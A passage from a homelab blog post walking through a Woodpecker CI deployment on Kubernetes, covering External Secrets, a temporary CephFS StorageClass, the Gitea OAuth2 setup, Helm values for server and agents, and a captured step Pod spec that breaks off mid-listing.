</span></span><span style="display:flex;"><span><span style="color:#f92672">roleRef</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apiGroup</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Role</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-woodpecker-role</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">subjects</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ServiceAccount</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-woodpecker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span></code></pre></div><p>This SecretStore then allows me to use External Secrets&rsquo; ExternalSecret
templating to take the automatically created CNPG Secret and bring it into a
format usable with the Woodpecker Helm chart. I decided to
use the <code>envFrom.secretRef</code> method to turn all of the Secret&rsquo;s keys into env
variables:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;woodpecker-db-secret&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">secrets-store</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">SecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;1h&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">creationPolicy</span>: <span style="color:#e6db74">&#39;Owner&#39;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">WOODPECKER_DATABASE_DATASOURCE</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">woodpecker-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">uri</span>
</span></span></code></pre></div><p>That ExternalSecret takes the <code>uri</code> key from the automatically created CNPG
Secret and writes its content into a new Secret&rsquo;s <code>WOODPECKER_DATABASE_DATASOURCE</code>
key.
And just like that, I have a Secret in the right format to use with
Woodpecker&rsquo;s Helm chart.</p>
<p>After I implemented the above, I had another thought on how I could do the same
thing without taking the detour via ExternalSecret. The Helm chart does provide
options to add extra volume mounts. Furthermore, Woodpecker has the
<code>WOODPECKER_DATABASE_DATASOURCE_FILE</code> variable, which allows reading the
connection string from a file. So I could have mounted the CNPG DB Secret as a
volume and then pointed this variable at the file containing the <code>uri</code> key.
Sadly I only realized this a bit late, but I will keep the possibility in
mind should I come across another Helm chart which lacks the option
to assign arbitrary Secret keys to env variables.</p>
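<p>For completeness, here&rsquo;s a rough sketch of what that alternative could have looked
like. The <code>extraVolumes</code>/<code>extraVolumeMounts</code> value names and the mount path are
assumptions on my part, so check the chart&rsquo;s <code>values.yaml</code> for the actual keys.
The point is only the Secret-as-volume pattern combined with the <code>_FILE</code> variable:</p>
<pre tabindex="0"><code>server:
  env:
    # Point Woodpecker at a file instead of passing the connection string directly
    WOODPECKER_DATABASE_DATASOURCE_FILE: /etc/woodpecker-db/uri
  # The following value names are hypothetical - the chart may call them differently
  extraVolumes:
    - name: db-secret
      secret:
        secretName: woodpecker-pg-cluster-app
  extraVolumeMounts:
    - name: db-secret
      mountPath: /etc/woodpecker-db
      readOnly: true
</code></pre>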
<h2 id="temporary-storageclass">Temporary StorageClass</h2>
<p>Woodpecker needs some storage for every pipeline executed. That storage is
shared between all steps and is used to clone the repository and share
intermediate artifacts between steps.</p>
<p>With the Kubernetes backend, Woodpecker uses PersistentVolumeClaims, one per
pipeline run. It also automatically cleans those up after the pipeline has run
through.
The issue for me is that in my Rook Ceph setup, the StorageClasses all have their
reclaim policy set to <code>Retain</code>. This is mostly because I&rsquo;m not the smartest guy
under the sun, and there&rsquo;s a real chance that I might accidentally remove a
PVC with data I would really like to keep.
But that&rsquo;s a problem for these temporary PVCs, which are only relevant for the
duration of a single pipeline run. Using my standard StorageClasses would mean
ending up with a lot of unused PersistentVolumes.</p>
<p>So I had to create another StorageClass with the reclaim policy set to <code>Delete</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">storage.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">StorageClass</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelab-fs-temp</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">provisioner</span>: <span style="color:#ae81ff">rook-ceph.cephfs.csi.ceph.com</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">reclaimPolicy</span>: <span style="color:#ae81ff">Delete</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">clusterID</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">fsName</span>: <span style="color:#ae81ff">homelab-fs</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pool</span>: <span style="color:#ae81ff">homelab-fs-bulk</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">csi.storage.k8s.io/provisioner-secret-name</span>: <span style="color:#ae81ff">rook-csi-cephfs-provisioner</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">csi.storage.k8s.io/provisioner-secret-namespace</span>: <span style="color:#e6db74">&#34;{{ .Release.Namespace }}&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">csi.storage.k8s.io/controller-expand-secret-name</span>: <span style="color:#ae81ff">rook-csi-cephfs-provisioner</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">csi.storage.k8s.io/controller-expand-secret-namespace</span>: <span style="color:#e6db74">&#34;{{ .Release.Namespace }}&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">csi.storage.k8s.io/node-stage-secret-name</span>: <span style="color:#ae81ff">rook-csi-cephfs-node</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">csi.storage.k8s.io/node-stage-secret-namespace</span>: <span style="color:#e6db74">&#34;{{ .Release.Namespace }}&#34;</span>
</span></span></code></pre></div><p>This uses CephFS as the provisioner, because I want those volumes to be RWX capable,
which is not the case for RBD-based volumes.</p>
<p>Using this StorageClass, the PersistentVolume is deleted when the PVC is
deleted, freeing the space for the next pipeline run.</p>
<h2 id="gitea-configuration">Gitea configuration</h2>
<p>Because Woodpecker needs access to Gitea, there&rsquo;s some configuration
necessary as well, mainly related to the fact that Woodpecker doesn&rsquo;t have its
own authentication and instead relies on the forge it&rsquo;s connected to.</p>
<p>To begin with, Woodpecker needs to be added as an OAuth2 application. This can
be done by any user, under the <code>https://gitea.example.com/user/settings/applications</code>
URL. The configuration is the same as for any other OAuth2 provider: Woodpecker
needs a client ID and a client secret.</p>
<p>The application can be given any name, and the redirect URL has to be
<code>https://&lt;your-woodpecker-url&gt;/authorize</code>:</p>
<figure>
    <img loading="lazy" src="gitea_add_app.png"
         alt="A screenshot of Gitea&#39;s OAuth2 client app creation form. In the &#39;Application Name&#39; field, it shows &#39;Woodpecker Blog Example&#39;, and in the &#39;Redirect URIs&#39; field, it shows &#39;https://ci.example.com/authorize&#39;. The &#39;Confidential Client&#39; option is enabled."/> <figcaption>
            <p>Gitea&rsquo;s OAuth2 creation form.</p>
        </figcaption>
</figure>

<p>After clicking <em>Create Application</em>, Gitea creates the app and shows the
necessary information:</p>
<figure>
    <img loading="lazy" src="gitea_add_info.png"
         alt="A screenshot of Gitea&#39;s OAuth2 app information screen. It shows the randomly generated &#39;Client ID&#39; and &#39;Client Secret&#39; and allows changing the &#39;Application Name&#39; and &#39;Redirect URIs&#39; fields."/> <figcaption>
            <p>Gitea&rsquo;s OAuth2 information page.</p>
        </figcaption>
</figure>

<p>I then copied the <em>Client ID</em> and <em>Client Secret</em> fields into my Vault instance
and provided them to Kubernetes with another ExternalSecret:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;gitea-secret&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hashi-vault-store</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;1h&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">creationPolicy</span>: <span style="color:#e6db74">&#39;Owner&#39;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">WOODPECKER_GITEA_CLIENT</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">secret/gitea-oauth</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">clientid</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">WOODPECKER_GITEA_SECRET</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">secret/gitea-oauth</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">clientSecret</span>
</span></span></code></pre></div><p>That was all the Gitea config necessary. There&rsquo;s going to be one more step
when accessing Woodpecker for the first time. Because it uses OAuth2, it will
redirect you to Gitea to log in, and Gitea will then need confirmation that
Woodpecker can access your account info and repositories.</p>
<h2 id="deploying-woodpecker">Deploying Woodpecker</h2>
<p>For deploying Woodpecker itself, I&rsquo;m using the <a href="https://github.com/woodpecker-ci/helm">official Helm chart</a>.
It&rsquo;s split into two subcharts, one for the agents which run the pipelines and
one for the server. Let&rsquo;s start with the server part of the <code>values.yaml</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metrics</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_OPEN</span>: <span style="color:#e6db74">&#34;false&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_HOST</span>: <span style="color:#e6db74">&#39;https://ci.example.com&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_DISABLE_USER_AGENT_REGISTRATION</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_DATABASE_DRIVER</span>: <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_GITEA</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_GITEA_URL</span>: <span style="color:#e6db74">&#34;https://gitea.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_PLUGINS_PRIVILEGED</span>: <span style="color:#e6db74">&#34;woodpeckerci/plugin-docker-buildx:latest-insecure&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraSecretNamesForEnvFrom</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">gitea-secret</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">woodpecker-db-secret</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">persistentVolume</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-bulk</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">host</span>: <span style="color:#ae81ff">ci.example.com</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">paths</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">128Mi</span>
</span></span></code></pre></div><p>As I do so often, I explicitly set <code>metrics.enabled</code> to <code>false</code>, so that later
I can go through my Homelab repo and slowly enable metrics for the apps I&rsquo;m
interested in, just by grepping for <code>metrics</code>.</p>
<p>Woodpecker is entirely configured through environment variables. I&rsquo;ve configured
those which don&rsquo;t contain secrets right in the <code>values.yaml</code>, and the secrets
are added via the <code>extraSecretNamesForEnvFrom</code> list. Those are the Gitea OAuth2
and CNPG DB Secrets. The server itself also needs some storage space, which I
put on my bulk storage pool with the <code>persistentVolume</code> option. I&rsquo;m also
configuring the Ingress and resources.</p>
<p>A short comment on the resources: make sure that you know what you&rsquo;re doing. &#x1f605;
I initially had the <code>cpu: 100m</code> resource set under <code>limits</code> by accident. And
then I was wondering yesterday why the Woodpecker server was being restarted so often
due to failed liveness probes. Turns out that 100m is not enough CPU
when the Pod happens to run on a Pi 4 and I&rsquo;m also clicking around in the Web UI.
The liveness probe then doesn&rsquo;t get a timely answer and starts failing, ultimately
restarting the Pod.</p>
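<p>For illustration, this is roughly the difference. The first variant is what I
accidentally had, the second is what I actually wanted, with only the memory
limited and the CPU merely requested:</p>
<pre tabindex="0"><code># What I had by accident: the server gets throttled hard at 100m CPU
resources:
  limits:
    cpu: 100m
    memory: 128Mi

# What I actually wanted: CPU only requested, memory limited
resources:
  requests:
    cpu: 100m
  limits:
    memory: 128Mi
</code></pre>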
<p>The second part of a Woodpecker deployment is the agents. Those are the part
of Woodpecker that runs the actual pipelines, launching the containers for each
step. Woodpecker supports multiple backends. The first one is the traditional
Docker backend, which needs the agent to have access to the Docker socket.
That&rsquo;s the config I&rsquo;ve been running up to now with my Drone setup.
It had two big downsides for me. The first was that a piece of software explicitly
intended to execute arbitrary code would have full access to the host&rsquo;s Docker
daemon.
The second was that the agent could only run pipelines on its own host, which
meant that it couldn&rsquo;t distribute the different steps across my entire Nomad cluster.</p>
<p>Now, with Woodpecker, I&rsquo;m making use of the <a href="https://woodpecker-ci.org/docs/administration/backends/kubernetes">Kubernetes Backend</a>.
With this backend, the agents themselves only work as an interface to the
k8s API, launching one Pod for each step and creating the PVC used as shared
storage for all steps of a pipeline.</p>
<p>One quirk of the Kubernetes backend is that it adds a NodeSelector matching the
architecture of the agent which launches the pipeline. So when the agent
executing a pipeline happens to be an ARM64 machine, all Pods for that pipeline
will also run on ARM64 machines. But this can be overridden for individual
steps as well.</p>
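<p>As far as I understand the Kubernetes backend docs, that per-step override goes
through <code>backend_options</code>. A sketch of pinning a single step to AMD64 nodes might
look roughly like this:</p>
<pre tabindex="0"><code>steps:
  - name: build-amd64
    image: debian
    commands:
      - echo This step should land on an AMD64 node
    # Per-step override of the architecture NodeSelector added by the backend
    backend_options:
      kubernetes:
        nodeSelector:
          kubernetes.io/arch: amd64
</code></pre>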
<p>Here is the agent portion of the Woodpecker Helm <code>values.yaml</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">agent</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicaCount</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_BACKEND</span>: <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_MAX_WORKFLOWS</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_BACKEND_K8S_NAMESPACE</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_BACKEND_K8S_VOLUME_SIZE</span>: <span style="color:#ae81ff">10G</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_BACKEND_K8S_STORAGE_CLASS</span>: <span style="color:#ae81ff">homelab-fs-temp</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_BACKEND_K8S_STORAGE_RWX</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">persistence</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-bulk</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">accessModes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">ReadWriteOnce</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceAccount</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">create</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">rbac</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">create</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">128Mi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">topologySpreadConstraints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">maxSkew</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">topologyKey</span>: <span style="color:#e6db74">&#34;kubernetes.io/arch&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">whenUnsatisfiable</span>: <span style="color:#e6db74">&#34;DoNotSchedule&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labelSelector</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">&#34;app.kubernetes.io/name&#34;: </span><span style="color:#ae81ff">agent</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">&#34;app.kubernetes.io/instance&#34;: </span><span style="color:#ae81ff">woodpecker</span>
</span></span></code></pre></div><p>Here I&rsquo;m configuring two agents, one on each architecture. In my cluster,
the <code>topologySpreadConstraints</code> lead to one agent running on AMD64 and one
running on ARM64. I&rsquo;m also telling
the agents which StorageClass to use; as explained above, I had to create
a new one with the reclaim policy set to <code>Delete</code>. I&rsquo;m setting a default 10 GB
size for the pipeline volumes.</p>
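<p>Roughly speaking, each pipeline run should then end up with a temporary PVC along
the lines of the following sketch. The name is generated by Woodpecker, so this is
only an approximation of what the agent requests with the settings above:</p>
<pre tabindex="0"><code>apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: wp-example-pipeline-volume
  namespace: woodpecker
spec:
  # RWX because WOODPECKER_BACKEND_K8S_STORAGE_RWX is set to true
  accessModes:
    - ReadWriteMany
  storageClassName: homelab-fs-temp
  resources:
    requests:
      storage: 10G
</code></pre>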
<p>Before continuing with some CI pipeline configs, let&rsquo;s have a short look at
the Pods Woodpecker launches. I&rsquo;ve captured the Pod for the following Woodpecker
CI step:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">build</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">debian</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">echo &#34;This is the build step&#34;</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">echo &#34;binary-data-123&#34; &gt; executable</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">chmod u+x ./executable</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">sleep 120</span>
</span></span></code></pre></div><p>It looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Pod</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">step</span>: <span style="color:#ae81ff">build</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wp-01jhkac6pf4jyfywavjg6be5cq</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">/bin/sh</span>
</span></span><span style="display:flex;"><span>    - -<span style="color:#ae81ff">c</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">echo $CI_SCRIPT | base64 -d | /bin/sh -e</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_COMMIT_AUTHOR</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">mmeier</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_COMMIT_AUTHOR_AVATAR</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://gitea.example.com/avatars/d941e68cc8aa38efdee91c3e3c97159e</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_COMMIT_AUTHOR_EMAIL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">mmeier@noreply.gitea.example.com</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_COMMIT_BRANCH</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">master</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_COMMIT_MESSAGE</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Add a sleep to inspect the Pod</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_COMMIT_REF</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">refs/heads/master</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_COMMIT_SHA</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">353b9f67102ba120ffe9284aa711eb87c2542573</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_COMMIT_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://gitea.example.com/adm/ci-tests/commit/353b9f67102ba120ffe9284aa711eb87c2542573</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_FORGE_TYPE</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">gitea</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_FORGE_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://gitea.example.com</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_MACHINE</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">woodpecker-agent-1</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_CREATED</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1736888948&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_EVENT</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">push</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_FILES</span>
